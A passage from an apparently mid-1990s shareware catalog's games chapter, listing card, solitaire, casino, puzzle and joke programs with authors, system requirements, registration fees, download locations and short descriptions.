1.44 (01-01-96) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Mouse. + Strongly recommended: sound card. + Registration fee: $22.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + fax, CompuServe, mail support; bonus data; all ASP-wide offers + (see page 6); discounts on other products. + Look for: availability unknown on BBSs; WCANASTA.ZIP on + CompuServe in CIS:PCPRO forum LIBrary 10 (or contact userID + 100517,3313 for assistance). + SWREG#: 4183 + PsL#: 11642 + Download size: 740k (about 55 minutes with a 2400 baud modem) + Description: + The popular CANASTA card game is loads of feature-packed FUN in + this windowsversion! comfortable, windows-like operation + (drag&drop, undo, help, hints) wave sound and midi music, up to + 4 players, numerous options and variations, animated card + movements, high score list, complete rules of the game. works + perfectly with Windows 95 and NT. Try to beat the electronic + card sharks! + + + 17.4.1 Solitaire + + Product: Calculation Solitaire + Author: Daniel Thomas, 714-524-5625 + Version: 1.12 (12-23-91) + Needs: IBM PC, Windows 3.0 or better. 1024k RAM; EGA monitor; + Hercules monitor; Hard disk; Mouse. + Strongly recommended: VGA monitor; Modem. + Registration fee: $17.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support; + all ASP-wide offers (see page 6); disks of other shareware. + Look for: availability unknown on BBSs; CLCSOL.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 2 (or contact userID 72301,2164 for + assistance). + SWREG#: 4810 + Download size: 72k (about six minutes with a 2400 baud modem) + Description: + A solitaire card game for Windows 3.x. All the features you've + come to expect from Windows card games, including: card + dragging, skill levels, top scores, unlimited undo, on-screen + hints, changing card backs, and more. Skill plays an important + part in this game. + + Chapter 17, "Games" 596 + + + + Product: Canfield for Windows + Author: Daniel Thomas, 714-524-5625 + Version: 1.01 (01-04-92) + Needs: IBM PC, Windows 3.0 or better. 1024k RAM; EGA monitor; + Hercules monitor; Hard disk; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $17.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support; + all ASP-wide offers (see page 6); disks of other shareware. + Look for: availability unknown on BBSs; CANFLD.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 2 (or contact userID 72301,2164 for + assistance). + SWREG#: 3758 + Download size: 104k (about eight minutes with a 2400 baud modem) + Description: + A solitaire card game for Windows 3.x. Lots of bells and + whistles (plus some surprises), such as: cheating, card + dragging, skill levels, top scores, unlimited undo, on-screen + hints, animated card backs, and more. + + + Product: PATIENCE 10 + Author: CoCoWare - Cowles Company Software (David A. Cowles), + 817-367-3603 + Version: 4.01 (05-21-94) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of mail support; 1-month return policy; bonus utilities. + 1 free update disk(s) sent out. + Look for: PATENC41.ZIP on BBSs; PATN41.ZIP on CompuServe in + DNT:KNOW forum LIBrary 0; PATENC41.ZIP on GEnie in DONT KNOW + forum LIBrary 0. + Download size: 161k (about twelve minutes with a 2400 baud modem) + Description: + Features a collection of 10 popular and addictive solitaire + card games all run from a single menu. The games include: + Accordion, Canfield, Dimaryp, Eliminate, Golf, Klondike, + Nestor, Pyramid, Stacker, and Vegas. Each game features its + own resetable best scores table. Documentation covers rules + and strategies for all ten games. Screen-sensitive Help and an + Undo feature are also included. A mouse is fully supported and + custom color setup is available to registrants. + + Chapter 17, "Games" 597 + + + + Product: Patience Abroad + Author: CoCoWare - Cowles Company Software (David A. Cowles), + 817-367-3603 + Version: 1.01 (05-21-94) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of mail support; 1-month return policy; bonus utilities. + Look for: ABROAD11.ZIP on BBSs (call N-A to download it at no + charge); ABRD11.ZIP on CompuServe in DNT:KNOW forum LIBrary 0; + ABROAD11.ZIP on GEnie in DONT KNOW forum LIBrary 0. + Download size: 162k (about twelve minutes with a 2400 baud modem) + Description: + Features a collection of 9 of the best solitaire card games and + puzzles around. The games are: Beleaguered Castle, Tower of + Hanoy, Monte Carlo, Weddings, the Great Wall, Russian Patience, + Sir Tommy, Four Kingdoms, and Florentine. Each game features + its own resetable best scores table. Documentation covers rules + and examples for all games. Screen-sensitive Help and an Undo + function are also included. A mouse is fully supported and + custom color and mouse setup are available to registrants. + + + Product: WinSol Plus + Author: Daniel Thomas, 714-524-5625 + Version: 1.02 (12-09-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; VGA + monitor; Hard disk; Mouse. + Strongly recommended: sound card. + Registration fee: $17.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited CompuServe, mail support; all ASP-wide + offers (see page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; WINSOL.EXE on CompuServe + in CIS:WINFUN forum LIBrary 2 (or contact userID 72301,2164 for + assistance). + SWREG#: 8762 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + A solitaire card game for Windows 3.1 and Windows 95. Similar + to the version that comes standard with Windows, with these + enhacements: Cheating(!), Hints, Sound, User-definable Game + Play, Auto-play Features, and much more. + + Chapter 17, "Games" 598 + + + + 17.5 Non-card games + + Product: BOXES + Windows action game-maneuver falling boxes. See full + description on page 586. + + 17.5.1 Solitaire + + Product: AntiC + AntiChaos puzzles. See full description on page 606. + + Product: ATC: Air Traffic Controller + Air traffic controller simulation. See full description on + page 618. + + Product: Equatron + Author: Glen DeBiasa + Version: 2.10 (07-08-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + Mouse. + Registration fee: $5.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited mail support. + Look for: availability unknown on BBSs; EQUTRN.EXE on CompuServe + in CIS:GAMERS forum LIBrary 13 (or contact userID 70602,3257 + for assistance). + Download size: 245k (about 18 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A challenging strategy game played against the computer. The + computer randomly generates a mathematical equation, which it + fills in with numbers from the game board. Your task is to beat + the computer, scoring more or less than the computer, depending + on the round. There are special tiles to help you in your task. + As the rounds progress, the stakes grow higher, and the + equations become complicated, adding more variables, operators, + parenthesis, and even exponents. Over 30 different equations. + + + Product: PEG + Peg solitaire and variations. See full description on + page 611. + + Chapter 17, "Games" 599 + + + + Product: Second Guess + Author: Arcanum Computing (Nels Anderson) + Version: 1.1 (07-10-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; VGA monitor; Hard + disk; Mouse. + Strongly recommended: SVGA monitor. SoundBlaster or + compatible. + Registration fee: $16.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; 3-month + return policy; all ASP-wide offers (see page 6). additional + tile sets & background pictures. + Look for: GUESS11.ZIP on BBSs (call 508-788-6951 to download it + at no charge); GUESS.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 20 (or contact userID 71020,2613 for assistance). + Download size: 860k (about 64 minutes with a 2400 baud modem) + Description: + Second Guess-solitaire and more! Concentration solitaire game + with every imaginable playing option, including three board + sizes, wild cards, various scoring options and more. Also multi + player games and play versus the computer. SuperVGA graphics + and digitized sound effects for SoundBlaster. Photo backgrounds + and sharp, detailed tiles for playing pieces with tile editor + included. + + + Product: Solo Peg + Author: R.K. West Consulting (Rosemary K. West) + Version: 1.0 (05-24-96) + Needs: IBM 80386, Windows 3.1 or better. 640k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $10.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: 3 months of unlimited fax, CompuServe, + mail support. Lifetime free upgrading allowed. Remove time + limit. + Look for: SOLPEG10.ZIP on BBSs; SOLOPEG.ZIP on CompuServe in + CIS:RKWEST forum LIBrary 9 (or contact userID 74774,403 for + assistance). + SWREG#: 11669 + PsL#: 14671 + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + The classic pegboard game in 6 colorful variations, including + Dueling Pegs. Have fun and sharpen your puzzle-solving skills. + It's a refreshing change of pace from Solitaire, and fun for + the whole family. Scores are saved in the Hall of Fame. $10 + registration includes unlimited upgrades. + + Chapter 17, "Games" 600 + + + + Product: Super Marble Solitaire + Author: Wrenware (Rennie A. Sawade), 216-371-0490 + Version: 1.2 (01-29-96) + Needs: IBM 80386, Windows 95 or better. Mouse. At least 256 + color display. + Registration fee: $19.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, CompuServe, mail support; all ASP-wide offers (see + page 6). + Look for: SPRSOL12.ZIP on BBSs; SPRSOL.ZIP on CompuServe in + CIS:PCFUN forum LIBrary 10 (or contact userID 71461,770 for + assistance). + SWREG#: 8408 + PsL#: 14392 + Download size: 568k (about 42 minutes with a 2400 baud modem) + Description: + Challenging puzzle for Windows 95. This game not only allows + you to play on different style boards with animated pieces, you + can even design you own board! Name your board design and enter + your name as the designer! There is extensive online + documentation that explains how to play well by using "move + patterns". + + + Product: Tile Match + Author: Arcanum Computing (Nels Anderson) + Version: 1.2 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; EGA monitor. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. Bonus tile sets & backgrounds. + Look for: TMATCH12.ZIP on BBSs (call 508-788-6951 to download it + at no charge); TMATCH.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 20 (or contact userID 71020,2613 for assistance). + Download size: 248k (about 19 minutes with a 2400 baud modem) + Description: + A colorful variation of concentration solitaire (also known as + memory) played with tiles. Includes many play options for a + single player, or can be played by 2 to 4 players or by a + single player against the computer. Multiple difficulty levels + and scoring options. Uses the same tile sets as Mah Jongg + solitaire and includes the TileMaker tile editing utility for + users to create their own tiles. + + + Product: WEBS + Strategy game of fast changing networks. See full description + on page 622. + + Chapter 17, "Games" 601 + + + + 17.6 Casino games + + See also: Home & hobby, Gambling. + + Product: A Day at the Races + Author: LatticeWork Software + Version: 1.3 (11-16-95) + Needs: IBM 80386, Windows 3.1 or better. 700k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: sound card. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of CompuServe, mail support; 3-month + limited return policy. + Look for: availability unknown on BBSs; HORSE.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 3 (or contact userID 74453,2112 for + assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Test your betting skills and luck on an exciting animated horse + racing game for up to four players. Choose one of eight horses + to win, place or show, based on posted odds which influence the + horses' performances. Create your own voice overlays and hear + yourself introduce the races. Also included are a full on-line + help, the option to toggle voices on and off, and to change the + speed of the race. This version is for Windows 3.1. + + + Product: A Day at the Races + Author: LatticeWork Software + Version: 1.3 (11-15-95) + Needs: IBM 80386, Windows 95 or better. 625k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: sound card. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of CompuServe, mail support; 3-month + limited return policy. + Look for: availability unknown on BBSs; HORSEB.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 15 (or contact userID 74453,2112 + for assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Test your betting skills and luck on an exciting animated horse + racing game for up to four players. Choose one of eight horses + to win, place or show, based on posted odds which influence the + horses' performances. Create your own voice overlays and hear + yourself introduce the races. Also included are a full on-line + help, the option to toggle voices on and off, and to change the + speed of the race. This version is for Windows 95. + + Chapter 17, "Games" 602 + + + + Product: RoboCrap.v94 + Author: Second Career Software + Version: 1.00 (01-02-95) + Needs: IBM PC, DOS 2.0 or better. 200k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. ANSI.SYS or equivalent. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $12.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime mail support; 1-month limited + return policy; bonus utilities. + Look for: RBCRAP10.ZIP on BBSs. + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + A fully-implemented, Las Vegas-style crap table simulation with + all the action and excitement of Craps, one of the fastest + moving and most exciting games in the casino. For up to 3 + players, beginners or experienced. + + + Product: ULTIMATE BACCARAT + Author: Accidental Software, 619-247-2804 + Version: 2.0 (03-15-94) + Needs: IBM PC, DOS 3.1 or better. 545k RAM; EGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, mail support; bonus utilities; all ASP-wide + offers (see page 6); discounts on other products. + Look for: BACRAT.ZIP on BBSs. + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Enter a fully animated casino and gambling school where you + play baccarat with 3 computer characters or with up to 5 other + "human" companions. Access the game statistics, see the game + rules, adjust your mouse, adjust the game speed, and much more. + Use the Tutor to learn the game then go it on your own. Bets + are adjustable from $20 to $500. Relax and learn to play this + game as the dealer talks you through every step. But be ware. + You may never quit playing. + + Chapter 17, "Games" 603 + + + + Product: ULTIMATE BLACKJACK + Author: Accidental Software, 619-247-2804 + Version: 3.0 (03-15-94) + Needs: IBM PC, DOS 3.1 or better. 540k RAM; EGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, mail support; bonus utilities; all ASP-wide + offers (see page 6); discounts on other products; discounts on + upgrades. + Look for: UBJ.ZIP on BBSs. + Download size: 345k (about 26 minutes with a 2400 baud modem) + Description: + Enter a fully animated casino card game and gambling school + where you play solo against the dealer or with up to 4 of 12 + computer characters. Set the number of decks, change the rules + to match any casino, and monitor stats as the game progresses. + A powerful simulation feature lets you test custom strategies! + You can even use two different card counting systems. Novices + will appreciate the slick on-line tutor that suggests the best + moves. But be prepared! This game is addictive. + + + 17.7 Dungeons & Dragons + + Product: Exile: Escape From the Pit + Huge, detailed fantasy role-playing game. See full description + on page 585. + + Product: Exile: Escape From the Pit + Huge, detailed fantasy role-playing game. See full description + on page 585. + + + 17.8 Jokes & humor + + Product: Crystal Ball + Humorous computerized psychic. See full description on + page 527. + + Chapter 17, "Games" 604 + + + + Product: Curses! + Author: R.K. West Consulting (Rosemary K. West) + Version: 3.1 (05-17-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CURSE31.ZIP on BBSs; CURSES.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + A humorous, creative "insult generator" with a different twist. + A single keystroke switches from insults to compliments! + Phrases are randomly generated from your vivid vocabulary. You + control the contents, so the program can generate descriptive + phrases on any subject. + + + Product: Jokes & Quotes + Network/standalone daily message system. See full description + on page 369. + + Product: Practical Joke Collection + Three harmless practical jokes for DOS. See full description + on page 610. + + Product: Rev. Lowell's Treasury of Humor + Author: Bardon Data Systems, 510-526-8470 + Version: 1.01 (03-01-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $18.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; bonus utilities; bonus + data; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; LOWELL.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 3 (or contact userID 72340,375 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A hyper-indexed Windows 3.1 collection of great anecdotes, + funny stories, zingy one-liners, revealing quotes. Search by + topic, keywords, etc. Print or copy chosen items. Excellent + source material for speakers, writers, toastmasters, ministers! + Or just read page by page for fun! Illustrated in color & B/W. + Collected by Rev. Lowell over his 30-year career as an ordained + minister. "Very high quality material" + + Chapter 17, "Games" 605 + + + + 17.9 Logic & brain games + + Product: ANARCHY + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 2.0 (02-05-96) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus utilities; + bonus data; bonus graphics; bonus templates; all ASP-wide + offers (see page 6); disks of other shareware; discounts on + other products; discounts on upgrades. + Look for: availability unknown on BBSs; ANRCHY.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 0 (or contact userID 76703,3046 for + assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + A cross between Othello and Life. The object is make the + pattern into a single color using the fewest number of moves. + These networks consist of icons connected to each other by + colored arrows. Each icon is one of 3 colors and sends its + color to neighboring icons in the network. If only one color + comes into a icon, it takes that color. If two colors come in, + ey cancel and the icon assumes the third color. + + + Product: Ancient Yacht + An animated dice game with sound effects. See full description + on page 617. + + Product: Ancient Yacht + An animated dice game with sound effects. See full description + on page 617. + + Chapter 17, "Games" 606 + + + + Product: AntiC + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.14 (09-01-92) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; bonus + utilities; disks of other shareware; discounts on other + products. + Look for: availability unknown on BBSs; ANTICX.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 6 (multiple files) (or contact + userID 76703,3046 for assistance). + SWREG#: 1708 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A cross between Othello and Life. Each square sends its color + to the neighboring squares in the network. If only one color + comes into a square, it takes that color. If two colors come + in, they cancel and the square assumes the third color. Each + time you change a square, all squares in the pattern are + recalculated and redrawn. change puzzles and display + + + Product: BOXES + Windows action game-maneuver falling boxes. See full + description on page 586. + + Product: BOXES II + Author: DynoTech Software (David Carlson), 573-774-5001 + Version: 1.1 (01-09-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; Hard disk; + Mouse; VBRUN300.DLL. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month limited return policy; bonus + data; bonus graphics; bonus game levels; all ASP-wide offers + (see page 6); disks of other shareware; discounts on upgrades; + registration commissions. + Look for: BOXTWO11.ZIP on BBSs (call 573-774-5907 to download it + at no charge); BOXTWO.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 0 (or contact userID 71373,572 for assistance). + SWREG#: 8214 + Download size: 1152k (about 86 minutes with a 2400 baud modem) + Description: + This sequel to BOXES includes new levels, new background music + (still classical), and many new features. BOXES II has a new + 3-D look with no more black-out screens. If you don't like one + + Chapter 17, "Games" 607 + + + + of the relaxing background tunes, just click the radio button + to change the station. Pause anytime you have the urge. BOXES + II even gives you a "BOSS" key to help protect those + clandestine playing times. Eliminate colored crates from + playing area by maneuvering and dropping boxes. It's not as + easy as it looks! + + + Product: BOXES III + Author: DynoTech Software (David Carlson), 573-774-5001 + Version: 1.0 (06-01-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; Hard disk; + Mouse; VBRUN300.DLL. Supports joystick. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month limited return policy; bonus + data; bonus graphics; bonus game levels; all ASP-wide offers + (see page 6); disks of other shareware; discounts on upgrades; + registration commissions. Level designer - make your own + levels. + Look for: ?.ZIP on BBSs (call 573-774-5907 to download it at no + charge). + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Description: + Coming Summer 1996 final sequel to BOXES & BOXES II! Eliminate + colored crates from playing area by maneuvering and dropping + boxes. It's not as easy as it looks! This version has it all: + 200 levels; custom level designer; new "surprises"; more + classical background music (over one hour); pause button; a + zillion "cheat options"; and everything else you would want + from a Tetris-like game. + + + Product: Dino Cards + Card games for ages 5-9. See full description on page 593. + + Product: Dino Match + Memory-building for ages 5-9. See full description on + page 430. + + Product: Dino Trilogy + Collection of educational games - ages 5-12. See full + description on page 431. + + Product: Discover Juggling 1 - Balls + Learn to juggle 3, 4, and 5 balls. See full description on + page 544. + + Chapter 17, "Games" 608 + + + + Product: DOC DEFIANT + Author: Just For Me Software, Inc., 810-348-6697 + Version: 1.0 (02-01-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $12.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; lifetime + return policy; bonus game levels; all ASP-wide offers (see + page 6). + Look for: DEFIAN10.ZIP on BBSs; DEFIAN.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 71150,1305 for + assistance). + Download size: 251k (about 19 minutes with a 2400 baud modem) + Description: + Can you stop the dastardly Doc Defiant from unleashing his + freeze ray equipped satellite against Earth? To triumph, + you'll have to defeat four of Defiant's henchmen in a board + game requiring logic and strategy. You are the planet's last + defense; don't let everyone down. Suitable for all ages. + + + Product: Minefield For Everybody + Author: Judah Warshaw, +972-2-830-001 + Version: 1.1 (06-01-94) + Needs: IBM PC, DOS 3.3 or better. 128k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Mouse. + Registration fee: $5.00 + Registration benefits: lifetime unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: MFE110.ZIP on BBSs; MFE110.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 100274,205 for + assistance). + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + A classic minefield game that will run on any DOS system with a + 80x25 display. Supports both mouse and keyboard, has 5 preset + playfields, user definable playfiled size and difficutly, save + and load of games, 43/50 line EGA/VGA support full really big + playfields and more. Great for your old laptop or your friend's + XT! + + + Product: PentaBlox + Puzzle game for Windows. See full description on page 612. + + Product: Super Marble Solitaire + Super Marble Solitaire for Windows 95. See full description on + page 599. + + Chapter 17, "Games" 609 + + + + Product: Tangram + The anceint Chinesee jigsaw puzzle. See full description on + page 613. + + Product: WORDS + Spell words using falling letters. See full description on + page 627. + + + 17.10 Practical jokes + + Product: Practical Joke Collection + Author: R.K. West Consulting (Rosemary K. West) + Version: 2.0 (05-13-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: PJOKES20.ZIP on BBSs; PJOKES.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + THREE PRACTICAL JOKES = HARD AT WORK ties up your computer with + a Very Important (but imaginary) task so you can take a break. + The activity on screen looks too important to be interrupted. + Conceived as a change of pace from practical joke programs that + insult the user, LOVEDOS overwhelms the user with passionate + affection. NAG is for people who need still need (or enjoy) + daily parental supervision. + + + 17.11 Puzzles, mix & match + + Product: ANARCHY + Logic puzzle game. See full description on page 605. + + Product: AntiC + AntiChaos puzzles. See full description on page 605. + + Product: BOXES II + Align falling boxes with matching crates. See full description + on page 606. + + Product: BOXES III + Align falling Boxes with matching crates. See full description + on page 607. + + Chapter 17, "Games" 610 + + + + Product: Cryptik + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.4 (10-02-93) + Needs: IBM PC, DOS 2.1 or better. VGA monitor; Hard disk; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. + Look for: availability unknown on BBSs; CRYPT.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 5 (or contact userID 76703,3046 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Jigsaw puzzles too easy? Try Cryptique, the coded game. The + puzzle you choose is encoded to show its major colors, then the + pieces are jumbled. You need to match the colors to restore the + image. Hall of fame for your best scores. Save puzzles, + solution hints, simple mouse interface, and much more! Designed + to use all major SVGA boards in 800 x 600 mode, but also will + work on VGA if needed. All puzzles use original photography. + + + Product: GTI WordGrid + Word Puzzle Game. See full description on page 632. + + Product: Minefield For Everybody + Classic minefield game, runs on all systems. See full + description on page 608. + + Product: Palette Pleezer + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.25 (04-10-93) + Needs: IBM PC, DOS 2.1 or better. VGA monitor; Hard disk; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; disks of + other shareware; discounts on other products. + Look for: availability unknown on BBSs; PAL.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 5 (or contact userID 76703,3046 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Think concentration with colors - lots & lots of 'em! Stunning + images from around the world in SuperVGA color! But somehow, + the palette has become jumbled and it's up to you to restore + the image to its original beauty. How many times do you need to + look at the original? Start with 10 colors and work up to 99. + Great memory tester. Hall of fame for your best scores. Save + partly completed games, simple mouse interface. + + Chapter 17, "Games" 611 + + + + Product: PEG + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 2.06 (09-13-93) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of phone, CompuServe support. + Look for: availability unknown on BBSs; PEG.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 1705 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + No one really knows when PEG solitaire was invented. Some + stories trace it to prisoners during the French Revolution, but + published descriptions date at least 100 years earlier. Most + likely the game is even older. This presents variations on the + classic peg solitaire with multiple starting positions, and + varying endgames. One of the pleasures of playing the game on + your computer is that you can quickly set up the board to try + different strategies. Ages 8 to 88. + + + Product: PentaBlox + Author: Aquila Software (Trevor Poile), +44-(0)1892-531108 + Version: 1.01 (08-08-94) + Needs: IBM AT (80286), Windows 3.0 or better. 2000k RAM. + Strongly recommended: Mouse. + Registration fee: L-12.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; 2-month return policy; + discounts on upgrades. 12-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: PENTA101.ZIP on BBSs. + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + A puzzle for Windows based on a series of twelve unique shapes + described as pentominoes by Solomon Golomb. The 